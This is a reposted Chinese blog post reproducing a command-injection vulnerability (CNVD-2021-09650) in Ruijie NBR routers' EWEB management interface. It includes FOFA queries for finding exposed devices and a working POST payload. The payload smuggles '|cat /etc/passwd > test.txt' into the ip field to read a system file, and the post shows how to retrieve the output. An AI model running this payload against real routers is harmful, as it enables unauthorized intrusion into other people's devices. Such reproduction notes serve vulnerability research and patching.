0
0

锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)

漏洞描述

i ⭐

锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限

漏洞影响

s ✅

锐捷NBR路由器 EWEB网管系统

空间测绘

d ⭕

FOFA:title="锐捷网络-EWEB网管系统"


FOFA:icon_hash="-692947551"

漏洞复现

  • ✅访问首页

image-20220414212324788

  • ✅执行Payload命令
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

image-20220414212629480

  • 然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果

image-20220414212716512

个人博客

孤桜懶契:https://gylq.gitee.io/time

标签: 安全
本文转载自: https://blog.csdn.net/qq_35938621/article/details/124182275
版权归原作者 孤桜懶契 所有, 如有侵权,请联系我们删除。
登录后发布评论

“锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

网络安全法-网络运行安全

使用selenium/drissionpage时如何阻止chrome自动跳转http到https

docker desktop 里部署的Open WebUI 管理员密码忘记了的处理方法

在ubuntu20.04中搭建onsite比赛运行环境

利用开源的低代码表单设计器FcDesigner高效管理和渲染复杂表单结构

Kafka学习笔记

【前端】浏览器输入url到页面呈现发生了什么?

文章导航